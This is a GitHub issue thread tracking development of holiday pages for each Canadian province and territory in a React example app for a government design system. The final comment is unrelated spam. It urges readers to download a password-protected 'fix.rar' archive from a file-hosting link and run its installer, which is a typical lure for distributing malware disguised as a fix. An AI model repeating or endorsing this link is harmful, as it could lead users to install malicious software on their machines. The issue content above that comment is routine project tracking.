### ISSUE TITLE
Development: Holidays app - holidays pages

### ISSUE THREAD

**Issue by melaniebmn** [cds-snc/design-gc-conception#1103]
Develop the holiday pages for the holidays app in React.

## To do

Set up holiday pages:

- [x] Nationwide
- [x] Federal
- [x] Federal + provincial
- [x] Optional
- [x] Alberta
- [x] BC
- [x] Manitoba
- [x] New Brunswick
- [x] Newfoundland and Labrador
- [x] Nova Scotia
- [x] Northwest Territories
- [x] Nunavut
- [x] Ontario
- [x] PEI
- [x] Quebec
- [x] Saskatchewan
- [x] Yukon

## Done when:

- [x] Merged into `gcds-examples/fable-test-app`

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
